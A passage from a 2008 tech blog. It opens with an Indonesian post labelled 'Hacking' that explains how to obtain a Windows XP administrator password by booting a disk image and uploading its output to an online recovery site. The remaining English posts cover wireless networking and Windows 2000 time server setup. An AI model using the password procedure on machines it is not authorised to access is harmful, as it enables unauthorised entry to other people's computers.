melakukan cara-cara kasar tersebut karena resiko yang kita ambil akan lebih besar. Cara yang digunakan untuk menemukan password administartor sangat simple dan tidak perlu banyak pengetahuan yang dibutuhkan hanya tinggal mengikuti langkah dibawah ini :<br /><br />Keperluan yang dibutuhkan untuk mengetahui password administrator antara lain 1 buah disket, akses internet dan email:<br /><br />1. langkah pertama adalah mendownload file image.exe dari <br /> http://www.loginrecovery.com/referal.php?p=2 <br />2. Buat bootable disk dengan menjalankan file tersebut <br />3. Matikan computer lalu boot dengan menggunakan disk tersebut. (disk tersebut akan <br /> menghasilkan satu buah file upload.txt) <br />4. Setelah itu masuk ke windows xp secara normal (sebelumnya keluarkan disket) lalu <br /> buka http://www.loginrecovery.com/instructions.php <br />5. Masukkan disket lalu pilih upload.txt, masukkan alamat email dan access code lalu <br /> klik submit. <br /><span class="fullpost"><br />6. Kita akan mendapatkan konfirmasi lewat email untuk mengetahui password kita telah <br /> selesai. Sebenarnya website ini sangat cepat sekali untuk menemukan password <br /> tetapi karena kita menggunakannya secara gratisan maka harus menunggu 48 jam (2 <br /> hari) untuk bisa melihat password administrator, kecuali kalau mau bayar, dimenit <br /> itu juga password bisa ketahuan. <br />7. Bila telah 48 jam (lama bener yah ..) buka http://www.loginrecovery.com/<br /> results.php , masukkan alamat email saat kita mengupload, klik view lalu masukkan <br /> access code and .. password administrator ditemukan <br /><br />Memang segala sesuatu tidak ada yang sempurna tetapis situs ini mengklaim keberhasilan menemukan password diatas 98.5% hebat bukan …<br /><br /><br /><br /><a href="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ4Mw9n3gI/AAAAAAAAABY/BtYI0TB0G8U/s1600-h/pic1.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ4Mw9n3gI/AAAAAAAAABY/BtYI0TB0G8U/s320/pic1.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5189334462590606850" /></a><br /><a href="http://3.bp.blogspot.com/_FxZKHy6v3_I/SAQ5nQ9n3hI/AAAAAAAAABg/ynOvtrER6Wg/s1600-h/pic2.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_FxZKHy6v3_I/SAQ5nQ9n3hI/AAAAAAAAABg/ynOvtrER6Wg/s320/pic2.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5189336017368768018" /></a><br /><a href="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ5xw9n3iI/AAAAAAAAABo/8-vDops1OqA/s1600-h/pic3.bmp"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_FxZKHy6v3_I/SAQ5xw9n3iI/AAAAAAAAABo/8-vDops1OqA/s320/pic3.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5189336197757394466" /></a><br /><br /><br /><br /><br />Selamat mencoba dan ingat segala sesuatu yang kita perbuat, akibatnya kita sendiri yang mananggungnya jadi waspadalah…..<br /><br /><br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/cara-menemukan-password-administrator.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/cara-menemukan-password-administrator.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:04:00+07:00'>12:04 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=8278314138125979608' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=8278314138125979608' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=8278314138125979608&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> </div></div> <div class="date-outer"> <h2 class='date-header'><span>April 12, 2008</span></h2> <div class="date-posts"> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='8258618069607190943' itemprop='postId'/> <a name='8258618069607190943'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-design-expanding-wired.html'>Wireless Network Design - Expanding the Wired Network</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-8258618069607190943' itemprop='description articleBody'> Wireless network design is the process of generating a layout of hubs and links within an environment to ensure desired network availability and flow capacity. Designing a wireless network is quite different from a wire network design by taking advantage of some of the most advanced RF design kits and process technologies in the industry. Designs for wireless networks are based principally on projected subscriber density, desired coverage area, and traffic demand. Wireless design is one of the most challenging areas of electrical engineering, and the shortage of individuals who can address the issues of wireless design is expected to get worse over the next two decades.<br /><br />Wireless communication networks are essential for providing communications for mobile users, and while radio communications are useful in providing good coverage over large areas, the data transfer rates achievable with it is limited compared to the data transfer rates achievable with fixed networks. Wireless is inherently a shared medium, and wireless bridging of ethernet connections between locations is particularly attractive, due to the cost savings. Wireless networks can be used to connect adjacent buildings together or create to a link between locations up to 10 miles apart. Wireless LANs can also extend the reach of the wired network, providing previously unavailable connectivity to that network. Wireless LANs are especially ideal to implement in office buildings, manufacturing floors, health care centers, or campuses, and they can be adapted to both indoor and outdoor environments. In instances where wiring is not an option, wireless LAN implementations can also be used in buildings such as historical structures, open space floors, or buildings with sealed rooms. <br /><span class="fullpost"><br />Wireless LAN systems from can usually be installed in one day, and integrate seamlessly into the existing networks. Wireless networks will form virtual offices anywhere in the world and wireless video will can create remote classrooms, remote training facilities, and remote hospitals anywhere in the world. Wireless technology will also enables developing countries to build up their communications networks quickly and cheaply, bypassing the high cost and delays associated with building wired infrastructures.<br /><br />Designing a wireless communications system depends on using a complex set of engineering analysis that requires significant expertise and experience in radio frequency communications and networking, in addition to an in depth knowledge of the application requirements. Designing the wireless network is important to ensure configurations are setup correctly for wireless traffic to efficiently travel over the wired network. Design and integration of the wireless network and into the wired network is very important to maintaining the overall reliability of the network.<br /><br />Traditional wireless network design are based on the utilization of a single Home Location Register (HLR) for each wireless network, but growth considerations are prompting consideration for multiple HLR topologies. One of the major challenges for the wireless network design is the efficient mobility management, which can be addressed both globally and locally. The best way to properly implement wireless network design is to fully understand its balancing, coverage, and capacity. As time goes on, more and more wireless designs are beginning to come into the market due to growing consumer demand for a wire-free life.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/wireless-network-design-expanding-wired.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/wireless-network-design-expanding-wired.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:35:00+07:00'>12:35 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=8258618069607190943' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=8258618069607190943' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=8258618069607190943&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='6070557648294247924' itemprop='postId'/> <a name='6070557648294247924'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/how-to-fix-wireless-network.html'>How To Fix A Wireless Network</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-6070557648294247924' itemprop='description articleBody'> There are many benefits to be gained from having a wireless network. Certainly one of the biggest benefits to those business people on the move all the time is that they can easily gain access to their emails whilst they are waiting for a flight or a train. But it is also great for those who work from home as no longer do they need to restrict themselves to be sat at a desk instead if they want they can go and sit outside in the sunshine and do their work. However there are going to be times when a problem occurs with the network and this can be extremely infuriating. So what can one do to fix a wireless network problem? <br /><br />Below we provide you with a few steps which should hopefully help to fix your wireless network problem without having to resort to getting a professional in. Often the problem can be quite easily resolved by just going into the network settings on your laptop or PC and simply following the instructions provided to you reconnecting to the network should be easy. <br /><br />However it is important that before you actually try to rectify the problem that has occurred you should only arrange to make one change at a time. In most cases if you choose to change several settings at once and then reboot the laptop in all likelihood the changes you have made will have no effect and the problem will still be there. But by doing the changes one at a time you will be able to work out what is actually working for you and what isn't.<br /><span class="fullpost"><br />The first thing that you should be doing before you actually try to reconnect to the wireless network at any time when you lose connection is to check to make sure that your laptop has a wireless adapter. Luckily in most cases today many of the latest laptops and notebooks will have their adapter internally installed. But if it isn't then you will often find it has an external adapter instead.<br /><br />In order to carry out any repair the first thing that you should do is check to see if you are actually receiving a signal. With a large number of laptops, PC's and notebooks today you can get a software programs which not only tell you when connectivity has been lost but will also help you to re-establish it. All you need to do is click on the button which says reconnect to the wireless network and it will either connect you to the one you are currently on or it will connect you to one which actually has a much better signal.<br /><br />However if you find that when you use the method above in order to fix a wireless network problem and it does not achieve your desired goal. Then you may find that the only way to regain connection is by actually rebooting your PC, laptop or notebook altogether.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/how-to-fix-wireless-network.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/how-to-fix-wireless-network.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:33:00+07:00'>12:33 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=6070557648294247924' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=6070557648294247924' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=6070557648294247924&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='9037156861986263930' itemprop='postId'/> <a name='9037156861986263930'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adapter-problem.html'>Wireless Network Adapter Problem</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-9037156861986263930' itemprop='description articleBody'> There are a number of reasons as to why although your network adapter is connected to your laptop or notebook but on screen it is showing that it appears to be disconnected. In a large number of cases such a wireless network adapter can easily be resolved and generally with a few clicks of the mouse button you can be back online in a matter of minutes. <br /><br />Below we take you through the steps that you will need to follow if you have a problem with the connection to your wireless adapter if you are running either Windows XP or Vista or your laptop or notebook or even on your PC.<br /><br />Firstly we will take a look at the steps you need to carry out if you discover a problem with your wireless connection and you have Windows XP.<br /><br />Step 1 – First you need to click on start and then click on the control panel icon. <br />Step 2 – Now you need to double click on the icon that is entitled network connections and then right click on the icon called wireless network connection. When you get into this field you now need to click on the button called properties.<br />Step 3 – In the properties section you now need to click on the wireless network tab and then click on available networks. <br />Step 4 – Once you have access to the available networks you now need to click on the wireless network button and then the configure one. <br />Step 4 – An authentication tab will now appear on the screen in front of you and you need to click on this to enable authentication to take place and check to see if the network check box has been selected. If not then you need to click on this twice.<br /><span class="fullpost"><br />As for Windows Vista in order to rectify any kind of network adapter problem you need to follow step 1 and then these next few steps.<br /><br />Step 1 – The same as for Windows XP.<br />Step 2 – In the control panel section of the screen you now need to click on the Network and Internet icon and then click on the network and sharing center one. <br />Step 3 – Then a further icon will appear in front of you called manage network connections and you need to click on this.<br />Step 4 – Now you should right click the network which will then disable 802.1X authentication for. Once this has been done you then need to click on the button called properties. Then click on the security tab and then go to security type list and then click on the no authentication tab/button.<br /><br />Hopefully using the above steps will then help to resolve the wireless network adapter problem that you may have. But the first thing that you should do prior to actually carrying out the steps mentioned above is to check to ensure that your adapter is actually connected properly to your laptop or notebook. Sometimes even if the external wireless network adapter has become slightly disconnected from your laptop can cause a problem with the signal and connection that you receive.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/wireless-network-adapter-problem.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adapter-problem.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:31:00+07:00'>12:31 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=9037156861986263930' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=9037156861986263930' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=9037156861986263930&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='7738706081592385407' itemprop='postId'/> <a name='7738706081592385407'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/new-technology-of-wireless-router.html'>A New Technology Of Wireless Router</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-7738706081592385407' itemprop='description articleBody'> Introduction A router is a device which receives a data packet and then passes it on to another device via best path of its destination. <br /><br />It is available in wired as well as in wireless models. Because of the tough competition in the market, it has become bit difficult to opt for the best wireless router. Therefore, you should always scrutinize the market properly before setting up a deal with any of the companies.<br /><br />Working Of A Wireless Router The basic concept behind the working of the wireless router is to forward the data packets from a wireless network to the destination address by reading the received packets. <br /><br />Various Types Of Wireless Routers The followings are the most popular wireless routers: 1. Linksys Wireless G Broadband Router and Belking Wireless G Router function in the similar manner. The wireless access point of these two routers lead to the connection of both the wireless G and wireless B connections. The wired Ethernet devices also get connected to the wireless network with the help of these routers. 2. Linksys Wireless B Broadband Router acts as a type of a splitter which splits the internet connection among the various computer systems that are present in the same vicinity. There is also a provision of communicating with each other within the same network with the help of this router. <br /><span class="fullpost"><br />How To Choose The Best Wireless Router As discussed earlier that there a wide range of wireless routers available in the market, therefore you should consider the following steps in order to opt for the best one. 1. After getting a clear picture of its functioning, you should try to figure out your need so that you should be able to select the router which will satisfy all your requirements. <br /><br />2. It is advisable to go through the reviews of the various customers either on the websites of the different companies which are into the service of providing wireless routers or by having a talk with the consumers directly. This practice will enable you to know the quality of the wireless routers along with the type of services provided by them. <br /><br />3. It is also recommended to opt for the prestigious and renowned companies of wireless routers so that your huge investment should not get into drains. <br /><br />4. After scrutinizing the various brands, the very next step is to get a comparative picture of its pricing, which can be easily done online or you can also visit the offices of the nearby retailers for the same. <br /><br />5. You should always make sure before purchasing a wireless router that it should be compatible to your broadband internet connection as well as to your existing hardware else it will be of no use for you if it lacks compatibility.<br /><br />6. The most significant feature of a wireless router which will assist you in opting for the best one is its speed. Because if you are looking for a router with an enormous speed of 108Mbit/s, then the right decision will be to go for a router with a "Turbo" mode. <br /><br />Hence, you can choose the best wireless router by considering the above-mentioned guidelines.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/new-technology-of-wireless-router.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/new-technology-of-wireless-router.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:26:00+07:00'>12:26 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=7738706081592385407' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=7738706081592385407' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=7738706081592385407&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='6176615887384362698' itemprop='postId'/> <a name='6176615887384362698'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/configuring-authoritative-time-server.html'>Configuring An Authoritative Time Server On A Windows 2000 Server</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-6176615887384362698' itemprop='description articleBody'> The Windows 2000 Server operating system includes a time synchronisation service called w32time or Windows Time. The service is installed by default and runs continuously in the service list. The time service is required by the Kerberos authentication protocol to ensure all computers running in a Windows 2000 environment utilise a common shared time. This article describes how to set up and configure an Authoritative Time Server in a Windows 2000 Server environment. It also discusses the hierarchical relationship at the heart of the service and provides some configuration hints and tips.<br /><br />The Windows Time Synchronisation Hierarchy The Windows 2000 time service utilises a hierarchical synchronisation structure: Desktop workstations and Member Servers nominate their domain controller as the source of time; Domain controllers nominate the PDC as their source of time synchronisation, but may also utilise a parent domain controller; PDC's follow the hierarchy of domains in the selection of their time synchronisation source.<br /><br />In the hierarchy the PDC emulator in the forest root domain is the primary time reference for the organisation. The PDC in the forest root domain can have its internal reference clock controlled in a number of ways:<br /><br />- By utilising it's own internal hardware system clock<br /><br />- By synchronising to an Internet based NTP time server.<br /><br />- By synchronising with a local intranet based NTP time server or hardware reference clock.<br /><br />- By utilising a hardware reference clock.<br /><br />Each of these methods of synchronisation described above raises a number of issues.<br /><span class="fullpost"><br />A PDC utilising it's own internal unsynchronised hardware system clock will drift significantly over time, transactions cannot be referenced to a traceable source of time.<br /><br />A PDC synchronising to an Internet based NTP time server can obtain accurate time. However, this raises security issues since the NTP port in the firewall must be left open for synchronisation. Also, Internet based NTP servers cannot provide authentication, so the source of time cannot be guaranteed.<br /><br />Many of the above issues can be solved yy synchronising a PDC with a local intranet based NTP time server or hardware clock. A local NTP server or hardware clock has the advantage of providing a traceable time reference and also secure authentication.<br /><br />The Windows 2000 Time Service Configuration.<br /><br />Configuration of the Windows 2000 Time Service is carried out by editing registry entries. It is highly recommended that the registry be backed up before conducting any modifications. This allows the registry to be restored in the event of erroneous modification.<br /><br />To configure the PDC master to utilise its internal system clock requires only that the W32Time registry entry HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeConfigAnnounceFlags is set to "A". This makes the PDC announce itself as a reliable time source. However, the system clock can drift over time and is not referenced to an accurate time source. Additionally, Windows Time will periodically generate system event log warnings indicating that the PDC should be configured to synchronise to an external time source. This warning can be ignored.<br /><br />To configure the PDC to to synchronise to an external time reference, a number of registry entries must be modified. The windows time service registry settings are stored in the registry at HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeParameters.<br /><br />The "Type", "Reliable Time Source" and "Local NTP" parameters must be set to the value "1". The "NTP Server" parameter must be set to a list of space delimited NTP server peers that the computer is to synchronise to. The "MaxAllowedClockErrInSecs" indicates the maximum number of seconds between the system time and received times that the received time is to be considered a valid new time. The "Period" parameter indicates the frequency with which the time service is to synchronise.<br /><br />After the registry entries have been correctly modified, the Windows Time service must be stopped and restarted. At a command prompt enter "net stop w32time && net start w32time" to restart the service.<br /><br />Hints and Tips.<br /><br />The correct operation of the Windows Time service depends heavily on the correct functioning of network devices and infrastructure. Common problems such as TCP/IP connectivity, DNS resolution, inaccurate NTP time references and network delay can all cause problems with the synchronisation service. Additionally, when synchronising to an Internet NTP server, ensure that USP port 123 is open on the firewall. UDP port 123 is the port reserved for NTP communication packets.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/configuring-authoritative-time-server.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/configuring-authoritative-time-server.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:25:00+07:00'>12:25 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=6176615887384362698' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=6176615887384362698' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=6176615887384362698&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='8598314452852247001' itemprop='postId'/> <a name='8598314452852247001'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/going-wireless.html'>Going Wireless</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-8598314452852247001' itemprop='description articleBody'> Are you interested in setting up a wireless network at your house? It may be easier than you expect. More importantly, you may find that once you’ve gone wireless, you’ll enjoy your Internet experiences more. Depending on how you set up your system, you may have one wireless network, or you may end you with a different configuration. For instance, you might have Wireless Network A and Wireless Network B.<br /><br />When you think of wireless, you may be thinking of WiFi. If your computer is WiFi enabled, then you can connect to the Internet via radio waves. Computers on the same network can use a Wireless LAN to connect several computers on the same network. <br /><br />Although many people think of wireless networks as something new, they’ve actually been around since the Second World War. Information was quickly transferred between countries. Now people enjoy the convenience of wireless networks. You no longer have to deal with the cables, wires, and phone lines you used to need to access the Internet. Now all you need is a wireless-enabled computer, plus some additional equipment, and you’re set to go. <br /><br />Of course, there are downsides to having a wireless network. Sometimes you’ll loose the signal, especially if something blocks the waves. In addition in cases of bad weather, you may be unable to use your system. Finally, wireless signals can pose security problems, so you may need to look into security options. You may find that the risk isn’t worth it and decide to stay with a wired connection. If you do decide to go wireless, you should consult a professional about what security options are available to minimize your risk.<br /><span class="fullpost"><br />When it comes to going wireless in your house, explore your options. To build your own wireless network, you’re going to need a few things. For starters, you’ll need network adapters and access points. You’ll also need a router. Finally, you may need a signal booster.<br /><br />The number of wireless network adapters you need depends on the number of computers you have. Each computer that will be accessing the wireless network will need an adapter. You may have seen the wireless adapters attached to laptops before. They look like cards stuck into the side of the laptop.<br /><br />You also need an access point. The access point operates as the base station for your system. In addition to an access point, you may need a wireless router for your system.<br /><br />When you’re serious about setting up a wireless network in your home or business, you need to talk to some experts. Many electronics stores have personnel who are trained to help consumers decide what they need to establish a wireless network in their home. Ask at your local store. You may be surprised at how easy it is to go wireless.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/going-wireless.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/going-wireless.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:18:00+07:00'>12:18 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=8598314452852247001' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=8598314452852247001' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=8598314452852247001&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' 